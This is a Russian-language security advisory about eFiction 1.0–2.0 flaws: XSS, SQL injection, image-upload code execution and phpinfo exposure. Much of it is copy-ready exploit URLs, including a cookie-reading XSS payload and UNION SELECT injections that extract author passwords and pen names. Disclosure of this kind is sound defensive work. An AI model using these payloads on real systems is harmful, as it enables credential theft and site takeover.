Программа: eFiction 1.0, 1.1 и 2.0.

Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к
потенциально важным данным, произвести XSS нападение и SQL-инъекцию и выполнить
произвольный PHP сценарий на системе.

1. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в
параметре "let" сценария "titles.php". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого сайта.

Пример:

efiction 1.0/1.1:

http://[target]/efiction/titles.php?action=viewlist& let=<script>alert(document.cookie)</script>

efiction 2.0 посредством SQL-инъекции:

http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,'<script>alert (document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

2. SQL-инъекция возможна из-за недостаточной обработки входных данных в
параметрах “let”, “sid” и “uid” в различных сценариях. Удаленный пользователь
может с помощью специально сформированного URL выполнить произвольные SQL
команды в базе данных приложения.

Пример:

efiction 1.0:

http://[target]/[path]/authors.php?action=viewlist&let=
'%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*

http://[target]/[path]/authors.php?action=viewlist&let=
%27%20UNION%20SELECT%20password,password
%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*

http://[target]/[path]/titles.php?action=viewlist&let=
'%20UNION%20SELECT%200,0,password,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20 FROM%20fanfiction_authors%20/*

http://[target]/[path]/viewstory.php?sid='%20UNION
%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:

http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,password,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM %20fanfiction_authors%20/*

http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%20password,0,0,0,0,0,
penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%20penname,0,0,0,0,0,0,
0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*

http://[target]/[path]/titles.php?action=viewlist&let='
%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,
password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*

http://[target]/[path]/viewuser.php?uid='UNION%
20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,
0%20FROM%20fanfiction_authors%20/*

http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0%20FROM%20efiction_fanfiction_authors%20/*

http://[target]/[path]/viewstory.php?sid='%20UNION%20
SELECT%20penname,penname,password,penname,penname,
penname,penname,penname,penname,penname,penname,penname,
penname,penname,penname,penname,penname,penname,penname,
penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0

http://[target]/[path]/titles.php?action=viewlist&let='%20UNION
%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,penname,0%20FROM%20fanfiction_authors%20/*

3. Уязвимость в "Manage Images" позволяет удаленному пользователю загрузить
валидные изображения с произвольным расширением. Удаленный пользователь может
загрузить валидное изображение, содержащее PHP код и выполнить его с
привилегиями web сервера.

4. Удаленный пользователь может запросить сценарий "phpinfo.php" и получить
потенциально важную информацию о системе.
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии